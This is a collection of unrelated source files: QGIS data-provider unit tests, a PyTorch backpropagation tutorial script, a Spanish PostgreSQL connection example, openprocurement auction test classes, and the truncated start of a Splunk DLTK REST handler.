self.assertFalse(f.hasGeometry(), 'Expected no geometry, got one')
self.assertTrue(f.isValid())
def testAddFeature(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
f1 = QgsFeature()
f1.setAttributes([6, -220, NULL, 'String', '15'])
f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
f2 = QgsFeature()
f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])
if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
# expect success
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
f1.setId(added[0].id())
f2.setId(added[1].id())
# check result
self.testGetFeatures(l.dataProvider(), [f1, f2])
# add empty list, should return true for consistency
self.assertTrue(l.dataProvider().addFeatures([]))
# ensure that returned features have been given the correct id
f = next(l.getFeatures(QgsFeatureRequest().setFilterFid(added[0].id())))
self.assertTrue(f.isValid())
self.assertEqual(f['cnt'], -220)
f = next(l.getFeatures(QgsFeatureRequest().setFilterFid(added[1].id())))
self.assertTrue(f.isValid())
self.assertEqual(f['cnt'], 330)
else:
# expect fail
self.assertFalse(l.dataProvider().addFeatures([f1, f2]),
'Provider reported no AddFeatures capability, but returned true to addFeatures')
def testAddFeatureFastInsert(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
f1 = QgsFeature()
f1.setAttributes([6, -220, NULL, 'String', '15'])
f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
f2 = QgsFeature()
f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])
if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
# expect success
result, added = l.dataProvider().addFeatures([f1, f2], QgsFeatureSink.FastInsert)
self.assertTrue(result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
self.assertEqual(l.dataProvider().featureCount(), 7)
def testAddFeatureMissingAttributes(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
return
# test that adding features with missing attributes pads out these
# attributes with NULL values to the correct length
f1 = QgsFeature()
f1.setAttributes([6, -220, NULL, 'String'])
f2 = QgsFeature()
f2.setAttributes([7, 330])
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(result,
'Provider returned False to addFeatures with missing attributes. Providers should accept these features but add NULL attributes to the end of the existing attributes to the required field length.')
f1.setId(added[0].id())
f2.setId(added[1].id())
# check result - feature attributes MUST be padded out to required number of fields
f1.setAttributes([6, -220, NULL, 'String', 'NULL'])
f2.setAttributes([7, 330, NULL, NULL, 'NULL'])
self.testGetFeatures(l.dataProvider(), [f1, f2])
def testAddFeatureExtraAttributes(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
return
# test that adding features with too many attributes drops these attributes
# we be more tricky and also add a valid feature to stress test the provider
f1 = QgsFeature()
f1.setAttributes([6, -220, NULL, 'String', '15'])
f2 = QgsFeature()
f2.setAttributes([7, -230, NULL, 'String', '15', 15, 16, 17])
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertTrue(result,
'Provider returned False to addFeatures with extra attributes. Providers should accept these features but truncate the extra attributes.')
# make sure feature was added correctly
added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7][0]
self.assertEqual(added.attributes(), [7, -230, NULL, 'String', '15'])
def testAddFeatureWrongGeomType(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
return
# test that adding features with incorrect geometry type rejects the feature
# we be more tricky and also add a valid feature to stress test the provider
f1 = QgsFeature()
f1.setGeometry(QgsGeometry.fromWkt('LineString (-72.345 71.987, -80 80)'))
f1.setAttributes([7])
f2 = QgsFeature()
f2.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
f2.setAttributes([8])
result, added = l.dataProvider().addFeatures([f1, f2])
self.assertFalse(result,
'Provider returned True to addFeatures with incorrect geometry type. Providers should reject these features.')
# make sure feature was not added
added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7]
self.assertFalse(added)
# yet providers MUST always accept null geometries
f3 = QgsFeature()
f3.setAttributes([9])
result, added = l.dataProvider().addFeatures([f3])
self.assertTrue(result,
'Provider returned False to addFeatures with null geometry. Providers should always accept these features.')
# make sure feature was added correctly
added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 9][0]
self.assertFalse(added.hasGeometry())
def testAddFeaturesUpdateExtent(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -65.3,78.3')
if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
f1 = QgsFeature()
f1.setAttributes([6, -220, NULL, 'String', '15'])
f1.setGeometry(QgsGeometry.fromWkt('Point (-50 90)'))
l.dataProvider().addFeatures([f1])
l.dataProvider().updateExtents()
self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -50.0,90.0')
def testDeleteFeatures(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
# find 2 features to delete
features = [f for f in l.dataProvider().getFeatures()]
to_delete = [f.id() for f in features if f.attributes()[0] in [1, 3]]
if l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
# expect success
result = l.dataProvider().deleteFeatures(to_delete)
self.assertTrue(result, 'Provider reported DeleteFeatures capability, but returned False to deleteFeatures')
# check result
self.testGetFeatures(l.dataProvider(), skip_features=[1, 3])
# delete empty list, should return true for consistency
self.assertTrue(l.dataProvider().deleteFeatures([]))
else:
# expect fail
self.assertFalse(l.dataProvider().deleteFeatures(to_delete),
'Provider reported no DeleteFeatures capability, but returned true to deleteFeatures')
def testDeleteFeaturesUpdateExtent(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
self.assertEqual(l.dataProvider().extent().toString(1), '-71.1,66.3 : -65.3,78.3')
to_delete = [f.id() for f in l.dataProvider().getFeatures() if f.attributes()[0] in [5, 4]]
if l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
l.dataProvider().deleteFeatures(to_delete)
l.dataProvider().updateExtents()
self.assertEqual(l.dataProvider().extent().toString(1), '-70.3,66.3 : -68.2,70.8')
def testTruncate(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
features = [f['pk'] for f in l.dataProvider().getFeatures()]
if l.dataProvider().capabilities() & QgsVectorDataProvider.FastTruncate or l.dataProvider().capabilities() & QgsVectorDataProvider.DeleteFeatures:
# expect success
result = l.dataProvider().truncate()
self.assertTrue(result,
'Provider reported FastTruncate or DeleteFeatures capability, but returned False to truncate()')
# check result
features = [f['pk'] for f in l.dataProvider().getFeatures()]
self.assertEqual(len(features), 0)
else:
# expect fail
self.assertFalse(l.dataProvider().truncate(),
'Provider reported no FastTruncate or DeleteFeatures capability, but returned true to truncate()')
def testChangeAttributes(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
# find 2 features to change
features = [f for f in l.dataProvider().getFeatures()]
# need to keep order here
to_change = [f for f in features if f.attributes()[0] == 1]
to_change.extend([f for f in features if f.attributes()[0] == 3])
# changes by feature id, for changeAttributeValues call
changes = {to_change[0].id(): {1: 501, 3: 'new string'}, to_change[1].id(): {1: 502, 4: 'NEW'}}
# changes by pk, for testing after retrieving changed features
new_attr_map = {1: {1: 501, 3: 'new string'}, 3: {1: 502, 4: 'NEW'}}
if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
# expect success
result = l.dataProvider().changeAttributeValues(changes)
self.assertTrue(result,
'Provider reported ChangeAttributeValues capability, but returned False to changeAttributeValues')
# check result
self.testGetFeatures(l.dataProvider(), changed_attributes=new_attr_map)
# change empty list, should return true for consistency
self.assertTrue(l.dataProvider().changeAttributeValues({}))
else:
# expect fail
self.assertFalse(l.dataProvider().changeAttributeValues(changes),
'Provider reported no ChangeAttributeValues capability, but returned true to changeAttributeValues')
def testChangeGeometries(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
# find 2 features to change
features = [f for f in l.dataProvider().getFeatures()]
to_change = [f for f in features if f.attributes()[0] == 1]
to_change.extend([f for f in features if f.attributes()[0] == 3])
# changes by feature id, for changeGeometryValues call
changes = {to_change[0].id(): QgsGeometry.fromWkt('Point (10 20)'), to_change[1].id(): QgsGeometry()}
# changes by pk, for testing after retrieving changed features
new_geom_map = {1: QgsGeometry.fromWkt('Point ( 10 20 )'), 3: QgsGeometry()}
if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries:
# expect success
result = l.dataProvider().changeGeometryValues(changes)
self.assertTrue(result,
'Provider reported ChangeGeometries capability, but returned False to changeGeometryValues')
# check result
self.testGetFeatures(l.dataProvider(), changed_geometries=new_geom_map)
# change empty list, should return true for consistency
self.assertTrue(l.dataProvider().changeGeometryValues({}))
else:
# expect fail
self.assertFalse(l.dataProvider().changeGeometryValues(changes),
'Provider reported no ChangeGeometries capability, but returned true to changeGeometryValues')
def testChangeFeatures(self):
if not getattr(self, 'getEditableLayer', None):
return
l = self.getEditableLayer()
self.assertTrue(l.isValid())
features = [f for f in l.dataProvider().getFeatures()]
# find 2 features to change attributes for
features = [f for f in l.dataProvider().getFeatures()]
# need to keep order here
to_change = [f for f in features if f.attributes()[0] == 1]
to_change.extend([f for f in features if f.attributes()[0] == 2])
# changes by feature id, for changeAttributeValues call
attribute_changes = {to_change[0].id(): {1: 501, 3: 'new string'}, to_change[1].id(): {1: 502, 4: 'NEW'}}
# changes by pk, for testing after retrieving changed features
new_attr_map = {1: {1: 501, 3: 'new string'}, 2: {1: 502, 4: 'NEW'}}
# find 2 features to change geometries for
to_change = [f for f in features if f.attributes()[0] == 1]
to_change.extend([f for f in features if f.attributes()[0] == 3])
# changes by feature id, for changeGeometryValues call
geometry_changes = {to_change[0].id(): QgsGeometry.fromWkt('Point (10 20)'), to_change[1].id(): QgsGeometry()}
# changes by pk, for testing after retrieving changed features
new_geom_map = {1: QgsGeometry.fromWkt('Point ( 10 20 )'), 3: QgsGeometry()}
if l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries and l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
# expect success
result = l.dataProvider().changeFeatures(attribute_changes, geometry_changes)
self.assertTrue(result,
'Provider reported ChangeGeometries and ChangeAttributeValues capability, but returned False to changeFeatures')
# check result
self.testGetFeatures(l.dataProvider(), changed_attributes=new_attr_map, changed_geometries=new_geom_map)
# change empty list, should return true for consistency
self.assertTrue(l.dataProvider().changeFeatures({}, {}))
elif not l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeGeometries:
# expect fail
self.assertFalse(l.dataProvider().changeFeatures(attribute_changes, geometry_changes),
'Provider reported no ChangeGeometries capability, but returned true to changeFeatures')
elif not l.dataProvider().capabilities() & QgsVectorDataProvider.ChangeAttributeValues:
# expect fail
self.assertFalse(l.dataProvider().changeFeatures(attribute_changes, geometry_changes),
'Provider reported no ChangeAttributeValues capability, but returned true to changeFeatures')
def testMinMaxAfterChanges(self):
"""
Tests retrieving field min and max value after making changes to the provider's features
"""
if not getattr(self, 'getEditableLayer', None):
return
vl = self.getEditableLayer()
self.assertTrue(vl.isValid())
self.assertEqual(vl.dataProvider().minimumValue(0), 1)
self.assertEqual(vl.dataProvider().minimumValue(1), -200)
self.assertEqual(vl.dataProvider().maximumValue(0), 5)
self.assertEqual(vl.dataProvider().maximumValue(1), 400)
# add feature
f6 = QgsFeature()
f6.setAttributes([15, 1400])
res, [f6] = vl.dataProvider().addFeatures([f6])
self.assertTrue(res)
self.assertEqual(vl.dataProvider().minimumValue(0), 1)
self.assertEqual(vl.dataProvider().minimumValue(1), -200)
self.assertEqual(vl.dataProvider().maximumValue(0), 15)
self.assertEqual(vl.dataProvider().maximumValue(1), 1400)
f7 = QgsFeature()
f7.setAttributes([0, -1400])
res, [f7] = vl.dataProvider().addFeatures([f7])
self.assertTrue(res)
self.assertEqual(vl.dataProvider().minimumValue(0), 0)
self.assertEqual(vl.dataProvider().minimumValue(1), -1400)
self.assertEqual(vl.dataProvider().maximumValue(0), 15)
self.assertEqual(vl.dataProvider().maximumValue(1), 1400)
# change attribute values
self.assertTrue(vl.dataProvider().changeAttributeValues({f6.id(): {1: 150}, f7.id(): {1: -100}}))
self.assertEqual(vl.dataProvider().minimumValue(1), -200)
self.assertEqual(vl.dataProvider().maximumValue(1), 400)
# delete features
f1 = [f for f in vl.getFeatures() if f['pk'] == 5][0]
f3 = [f for f in vl.getFeatures() if f['pk'] == 3][0]
self.assertTrue(vl.dataProvider().deleteFeatures([f6.id(), f7.id()]))
self.assertEqual(vl.dataProvider().minimumValue(0), 1)
self.assertEqual(vl.dataProvider().minimumValue(1), -200)
self.assertEqual(vl.dataProvider().maximumValue(0), 5)
self.assertEqual(vl.dataProvider().maximumValue(1), 400)
if vl.dataProvider().capabilities() & QgsVectorDataProvider.DeleteAttributes:
# delete attributes
if vl.dataProvider().deleteAttributes([0]):
# may not be possible, e.g. if it's a primary key
self.assertEqual(vl.dataProvider().minimumValue(0), -200)
self.assertEqual(vl.dataProvider().maximumValue(0), 400)
def testStringComparison(self):
"""
Test if string comparisons with numbers are cast by the expression
compiler (or work fine without doing anything :P)
"""
for expression in (
'5 LIKE \'5\'',
'5 ILIKE \'5\'',
'15 NOT LIKE \'5\'',
'15 NOT ILIKE \'5\'',
'5 ~ \'5\''):
iterator = self.source.getFeatures(QgsFeatureRequest().setFilterExpression('5 LIKE \'5\''))
count = len([f for f in iterator])
self.assertEqual(count, 5)
self.assertFalse(iterator.compileFailed())
if self.enableCompiler():
iterator = self.source.getFeatures(QgsFeatureRequest().setFilterExpression('5 LIKE \'5\''))
self.assertEqual(count, 5)
self.assertFalse(iterator.compileFailed())
self.disableCompiler()
def testConcurrency(self):
"""
The connection pool has a maximum of 4 connections defined (+2 spare connections)
Make sure that if we exhaust those 4 connections and force another connection
it is actually using the spare connections and does not freeze.
This situation normally happens when (at least) 4 rendering threads are active
in parallel and one requires an expression to be evaluated.
"""
# Acquire the maximum amount of concurrent connections
iterators = list()
for i in range(QgsApplication.instance().maxConcurrentConnectionsPerPool()):
iterators.append(self.vl.getFeatures())
# Run an expression that will also do a request and should use a spare
# connection. It just should not deadlock here.
feat = next(iterators[0])
context = QgsExpressionContext()
context.setFeature(feat)
exp = QgsExpression('get_feature(\'{layer}\', \'pk\', 5)'.format(layer=self.vl.id()))
exp.evaluate(context)
def testEmptySubsetOfAttributesWithSubsetString(self):
if self.source.supportsSubsetString():
try:
# Add a subset string
subset = self.getSubsetString()
self.source.setSubsetString(subset)
# First test, in a regular way
features = [f for f in self.source.getFeatures()]
count = len(features)
self.assertEqual(count, 3)
has_geometry = features[0].hasGeometry()
# Ask for no attributes
request = QgsFeatureRequest().setSubsetOfAttributes([])
# Make sure we still retrieve features !
features = [f for f in self.source.getFeatures(request)]
count = len(features)
self.assertEqual(count, 3)
# Check that we still get a geometry if we add one before
self.assertEqual(features[0].hasGeometry(), has_geometry)
finally:
self.source.setSubsetString(None)
|
# Implements the following 2 layer NN:
# Input=0.8, Bias=[-0.14, -0.11], Weight=[1.58, 2.45], Activation=Sigmoid
# y = sigmoid( -0.11 + 2.45 * sigmoid( -0.14 + 1.58 * 0.8 ) )
# L1 L2
# [0.8] - O - z - O - y
# Bl1=-0.14 Bl2=-0.11
# Wl1=1.58 Wl2=2.45
import torch
from torch import nn
from torch import optim
# Naive implementation
x = torch.tensor([0.8])
raw_activation = (x * 1.58) - 0.14
print("L1 raw activation: {}".format(raw_activation))
z = torch.sigmoid(raw_activation)
print("L1 o/p z: {}".format(z))
y = torch.sigmoid((z * 2.45) - 0.11)
print("L2 o/p y: {}".format(y))
# Create a single layer feed forward network with 1 input and 1 output.
# The weights and biases are auto initialized by pytorch.
l1 = nn.Linear(1, 1)
# Replace the weight and bias.
# Note: nn.Linear expects its weight and bias fields to be Parameters.
# Parameters don't help unless used in the larger context of a nn.Module.
# When used in such a context, these fields will appear in model attributes.
# The bias parameter is a 1d tensor because each Neuron only has 1 bias.
l1.bias = torch.nn.Parameter(torch.tensor([-0.14]))
# The weight needs to be an array of arrays because the Neuron can have any
# number of inputs, and each of those require a weight vector.
l1.weight = torch.nn.Parameter(torch.tensor([[1.58]]))
nn_raw_act = l1(x)
print("nn L1 raw activation: {}".format(nn_raw_act))
nn_z = torch.sigmoid(nn_raw_act)
print("nn L1 o/p z: {}".format(nn_z))
nn_y = torch.sigmoid((nn_z * 2.45) - 0.11)
print("nn L2 o/p y: {}".format(nn_y))
# NN defines a Neural Network.
#
# The input weights and bias vectors are expected to be of the same length.
# The number of layers is taken as the size of these vectors, since each layer
# is a 1 input 1 output Neuron.
#
# @weights: a list of weights.
# @bias: a list of bias values.
class NN(nn.Module):
def __init__(self, weights, bias):
super(NN, self).__init__()
layers = []
for i in range(len(weights)):
l = nn.Linear(1, 1)
l.weight = torch.nn.Parameter(torch.tensor([[weights[i]]]))
l.bias = torch.nn.Parameter(torch.tensor([bias[i]]))
layers.append(l)
self.layers = nn.ModuleList(layers)
# Forward takes a tensor 'x' and feeds it forward through the network.
def forward(self, x):
for i in range(len(self.layers)):
x = torch.sigmoid(self.layers[i](x))
print("NN L{} o/p: {}".format(i, x))
return x
model = NN([1.58, 2.45], [-0.14, -0.11])
output = model(x)
print("NN Output: {}".format(output))
# Backpropogation
# The dependency graph for this NN:
#
# L1 L2
# [0.8] - O - a(l-1) - O - zl - sigmoid - al(l=2) - predicted - c - MSE = 1/2(al - y)^2
# Bl1=-0.14 Bl2=-0.11 |
# Wl1=1.58 Wl2=2.45 y = real output (1.0)
#
# So we differentiate dc/dal = (al - y)
# Then we substitute al = sigmoid(zl) which means dal/dzl = sigmoid'(zl)
# And we apply the chain rule to compute:
# dc/dbl2 = dc/dal2 * dal2/dzl2 * dzl2/dbl2
# dc/dwl2 = dc/dal2 * dal2/dzl2 * dzl2/dwl2
# dc/da(l-1) = dc/dal2 * dal2/dzl2 * dzl2/da(l-1)
#
# Substituting the following values:
#
# dzl2/dbl2 = 1 (zl2 = bl2 + C)
# dzl2/dwl2 = a(l-1) (zl2 = C + wl2 * a(l-1))
# dal/dzl2 = sigmoid'(z) = sigmoid(z)(1 - sigmoid(z)) where sigmoid(z) = 1/(1+e^-z)
# dc/dal2 = (al-y)
#
# And update the weight and bias of l2:
# updated_wl2 = wl2 + dc/dwl2 * step
# updated_bl2 = bl2 + dc/dbl2 * step
#
# Similarly we can compute the updated values of wl1 and bl2:
# dc/dbl1 = dc/dal1 * dal1/dzl1 * dzl1/dbl1
# dc/dwl1 = dc/dal1 * dal1/dzl1 * dzl1/dwl1
#
# And update the weight and dias of l1:
# updated_wl1 = wl1 + dc/dwl1 * step
# updated_bl1 = bl1 + dc/dbl1 * step
y = torch.tensor([1.0])
cost = nn.MSELoss()
# Compute MSE for output
loss = cost(output, y)
# Zero out the gradient buffers for all parameters
model.zero_grad()
# Compute dloss/d(parameter) for all parameters which require gradient
loss.backward()
# Define and run the Gradient Descent optimizer
# This will apply the function: parameter = -lr * parameter.grad
optimizer = optim.SGD(model.parameters(), lr=0.1)
optimizer.step()
for i in range(len(model.layers)):
print("NN: Updated bias for l{} {}".format(i, model.layers[i].bias.item()))
print("NN: Updated weight for l{} {}".format(i, model.layers[i].weight.item()))
output = model(x)
print("NN: optimized output {}".format(output))
|
<gh_stars>0
# # Conexión a base de datos PostgreSQL
# Esta libreta establece un ejemplo de conexión a una base de datos PostgreSQL utilizando variables de ambiente
# La correcta ejecución de esta libreta incluye los siguientes elementos:
# * existe un archivo `.env` con las variables de ambiente de la conexión en la misma ubicación que la libreta
# * se dispone de una instancia de servicio PostgreSQL con la base de datos `universidad`
# 1. Conexión a la base de datos
# Inicialmente se requiere establecer la conexión con la base de datos.
# Primero se realizan los imports de los módulos requeridos para la tarea
from dotenv import load_dotenv
import sys, os
import numpy as np
import pandas as pd
import pandas.io.sql as psql
# Importa el conector de la base de datos PostgreSQL
from psycopg2 import connect
# Importa la gestión de errores del conector
from psycopg2 import OperationalError
# Carga las variables de ambiente del archivo .env
print("Cargando variables de entorno")
load_dotenv()
PGHOST = os.getenv('PGHOST')
PGPORT = os.getenv('PGPORT')
PGDATABASE= os.getenv('PGDATABASE')
PGUSER = os.getenv('PGUSER')
PGPASSWORD = os.getenv('PGPASSWORD')
print("1. Estableciendo conexión con la base de datos")
# Establece la conexión con la base de datos
try:
conn = connect(
host = PGHOST,
user = PGUSER,
dbname = PGDATABASE,
password = <PASSWORD>,
port = PGPORT)
print('Conectado!')
except OperationalError as err:
print('Error en la conexión: '+ err)
conn = None
# 2. Obtiene las filas de la tabla estudiante
# Crea el cursor de la conexión y establece la consulta a la tabla estudiantes
print("\n2. Generando la consulta con la base de datos")
cur = conn.cursor()
cur.execute("SELECT id_estudiante, nombre, numero_telefono \
FROM estudiante;")
# Obtiene las filas resultantes de la consulta
print(cur.fetchmany(size=10))
# Obtiene la cantidad de filas afectadas
print("Cantidad de filas: {0}".format(cur.rowcount))
# 3. Inserta un registro en la tabla estudiante y vuelve a consultar las filas de la tabla estudiante
#Crea el cursor
curInsert = conn.cursor()
# Establece los valores de los datos a insertar
idEstudiante = "123456"
nombreEstudiante = "María"
numeroTelefono = "+549 9876 123456"
# Ejecuta la acción de inserción con los datos como parámetros de la consulta
print("\n3. Insertando registro en la base de datos: ({0}, {1}, {2})".format(idEstudiante, nombreEstudiante, numeroTelefono))
curInsert.execute("INSERT INTO estudiante (id_estudiante, nombre, numero_telefono) \
VALUES (%s, %s, %s)", (idEstudiante, nombreEstudiante, numeroTelefono))
# Crea el cursor de la conexión y establece la consulta
cur = conn.cursor()
cur.execute("SELECT id_estudiante, nombre, numero_telefono \
FROM estudiante;")
# Obtiene las filas resultantes de la consulta
print(cur.fetchmany(size=10))
# Obtiene la cantidad de filas afectadas
print("Cantidad de filas: {0}".format(cur.rowcount))
# 4. Deshace las modificaciones (insert) a la base de datos y cierra la conexión
# Deshace las modificaciones a la base de datos
print("\n4. Deshaciendo los cambios en la base de datos")
conn.rollback()
# Libera los cursores
print("Liberando recursos y cerrando conexión")
cur.close()
curInsert.close()
# Cierra la conexión a la base de datos
conn.close()
print("Fin del script") |
<reponame>oleksiyVeretiuk/openprocurement.auctions.geb
# -*- coding: utf-8 -*-
import unittest
from openprocurement.auctions.core.tests.base import snitch
from openprocurement.auctions.geb.tests.base import (
BaseWebTest
)
from openprocurement.auctions.geb.tests.states import (
ProcedureMachine
)
from openprocurement.auctions.geb.tests.fixtures.active_enquiry import (
ACTIVE_ENQUIRY_AUCTION_DEFAULT_FIXTURE_WITH_QUESTION,
AUCTION_WITH_PENDING_BID,
AUCTION_WITH_ACTIVE_BID
)
from openprocurement.auctions.geb.tests.blanks.active_enquiry import (
add_document,
add_offline_document,
add_question,
answer_question,
auction_change_fields,
get_question,
bid_add,
bid_add_document_in_active_status,
bid_add_document_in_pending_status,
bid_delete_in_active_status,
bid_delete_in_pending_status,
bid_get_in_active_status,
bid_get_in_pending_status,
bid_make_activate,
bid_patch_in_active_status,
bid_patch_in_pending_status,
)
class StatusActiveEnquiryTest(BaseWebTest):
test_bid_add = snitch(bid_add)
test_add_question = snitch(add_question)
test_auction_change_fields = snitch(auction_change_fields)
def setUp(self):
super(StatusActiveEnquiryTest, self).setUp()
procedure = ProcedureMachine()
procedure.set_db_connector(self.db)
procedure.toggle('active.enquiry')
context = procedure.snapshot()
self.auction = context['auction']
entrypoints = {}
entrypoints['patch_auction'] = '/auctions/{}?acc_token={}'.format(self.auction['data']['id'],
self.auction['access']['token'])
entrypoints['get_auction'] = '/auctions/{}'.format(self.auction['data']['id'])
entrypoints['questions'] = '/auctions/{}/questions'.format(self.auction['data']['id'])
entrypoints['bids'] = '/auctions/{}/bids'.format(self.auction['data']['id'])
self.ENTRYPOINTS = entrypoints
class StatusActiveEnquiryQuestionsTest(BaseWebTest):
test_answer_question = snitch(answer_question)
test_get_question = snitch(get_question)
def setUp(self):
super(StatusActiveEnquiryQuestionsTest, self).setUp()
procedure = ProcedureMachine()
procedure.set_db_connector(self.db)
procedure.toggle('active.enquiry')
context = procedure.snapshot(fixture=ACTIVE_ENQUIRY_AUCTION_DEFAULT_FIXTURE_WITH_QUESTION)
self.auction = context['auction']
self.questions = context['questions']
class StatusActiveEnquiryPendingBidsTest(BaseWebTest):
docservice = True
test_bid_patch_in_pending_status = snitch(bid_patch_in_pending_status)
test_bid_make_activate = snitch(bid_make_activate)
test_bid_add_document_in_pending_status = snitch(bid_add_document_in_pending_status)
test_bid_delete_in_pending_status = snitch(bid_delete_in_pending_status)
test_bid_get_in_pending_status = snitch(bid_get_in_pending_status)
test_bid_patch_in_pending_status = snitch(bid_patch_in_pending_status)
def setUp(self):
super(StatusActiveEnquiryPendingBidsTest, self).setUp()
procedure = ProcedureMachine()
procedure.set_db_connector(self.db)
procedure.toggle('active.enquiry')
context = procedure.snapshot(fixture=AUCTION_WITH_PENDING_BID)
auction = context['auction']
bid = context['bids'][0]
entrypoints = {}
pattern = '/auctions/{auction}/bids/{bid}?acc_token={token}'
entrypoints['bid'] = pattern.format(auction=auction['data']['id'],
bid=bid['data']['id'],
token=bid['access']['token'])
pattern = '/auctions/{auction}/bids/{bid}/documents?acc_token={token}'
entrypoints['add_bid_document'] = pattern.format(auction=auction['data']['id'],
bid=bid['data']['id'],
token=bid['access']['token'])
self.ENTRYPOINTS = entrypoints
self.bid = bid
self.auction = auction
class StatusActiveEnquiryActiveBidsTest(BaseWebTest):
docservice = True
test_bid_patch_in_active_status = snitch(bid_patch_in_active_status)
test_bid_add_document_in_active_status = snitch(bid_add_document_in_active_status)
test_bid_delete_in_active_status = snitch(bid_delete_in_active_status)
test_bid_get_in_active_status = snitch(bid_get_in_active_status)
test_bid_patch_in_active_status = snitch(bid_patch_in_active_status)
def setUp(self):
super(StatusActiveEnquiryActiveBidsTest, self).setUp()
procedure = ProcedureMachine()
procedure.set_db_connector(self.db)
procedure.toggle('active.enquiry')
context = procedure.snapshot(fixture=AUCTION_WITH_ACTIVE_BID)
auction = context['auction']
bid = context['bids'][0]
entrypoints = {}
pattern = '/auctions/{auction}/bids/{bid}?acc_token={token}'
entrypoints['bid'] = pattern.format(auction=auction['data']['id'],
bid=bid['data']['id'],
token=bid['access']['token'])
pattern = '/auctions/{auction}/bids/{bid}/documents?acc_token={token}'
entrypoints['add_bid_document'] = pattern.format(auction=auction['data']['id'],
bid=bid['data']['id'],
token=bid['access']['token'])
self.ENTRYPOINTS = entrypoints
self.bid = bid
self.auction = auction
class StatusActiveEnquiryDocumentsTest(BaseWebTest):
docservice = True
test_add_document = snitch(add_document)
test_add_offline_document = snitch(add_offline_document)
def setUp(self):
super(StatusActiveEnquiryDocumentsTest, self).setUp()
procedure = ProcedureMachine()
procedure.set_db_connector(self.db)
procedure.toggle('active.tendering')
context = procedure.snapshot()
self.auction = context['auction']
entrypoints = {}
entrypoints['documents'] = '/auctions/{}/documents?acc_token={}'.format(self.auction['data']['id'],
self.auction['access']['token'])
self.ENTRYPOINTS = entrypoints
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(StatusActiveEnquiryTest))
suite.addTest(unittest.makeSuite(StatusActiveEnquiryQuestionsTest))
suite.addTest(unittest.makeSuite(StatusActiveEnquiryDocumentsTest))
suite.addTest(unittest.makeSuite(StatusActiveEnquiryPendingBidsTest))
suite.addTest(unittest.makeSuite(StatusActiveEnquiryActiveBidsTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
<filename>app/bin/dltk/core/deployment/rest_handlers.py
from urllib.parse import parse_qs, unquote
import os
from dltk.core.rest import BaseRestHandler
from dltk.core import algorithm
from dltk.core import deployment
from dltk.core import environment
from dltk.core import runtime
from dltk.core import is_truthy
from . core import *
from . get import *
from . jobs import trigger
from . import status
from . params import get_default_param
from dltk.core import get_label_for_name
__all__ = [
"DeploymentsHandler",
"DeploymentParamsHandler"
]
class DeploymentParamsHandler(BaseRestHandler):
def handle_GET(self):
algorithm_name = self.get_param("algorithm")
runtime_name = self.get_param("runtime")
environment_name = self.get_param("environment")
if algorithm_name and environment_name:
d = deployment.get(self.splunk, algorithm_name, environment_name)
a = d.algorithm
e = d.environment
r = a.runtime
def get_default(name): return get_default_param(name, e, algorithm=a)
def get_value(name): return d.get_param(name, inherit=False)
if runtime_name and environment_name:
e = environment.get(self.splunk, environment_name)
r = runtime.get(self.splunk, runtime_name)
def get_default(name): return get_default_param(name, e, runtime=r)
def get_value(_): return None
params = [{
"name": name,
"label": get_label_for_name(name),
"default": get_default(name),
"value": get_value(name),
"type": "text", # "picker" "text",
"mandatory": False,
"important": True, # True if name == "executor_instance_count" else False,
} for name in r.deployment_param_names]
self.send_entries(params)
def handle_PUT(self):
algorithm_name = self.get_param("algorithm")
environment_name = self.get_param("environment")
if not algorithm_name:
raise Exception("algorithm missing")
if not environment_name:
raise Exception("environment missing")
d = deployment.get(self.splunk, algorithm_name, environment_name)
if d is None:
raise Exception("algorithm_name=%s, environment_name=%s" % (algorithm_name, environment_name))
r = d.algorithm.runtime
changed_value = False
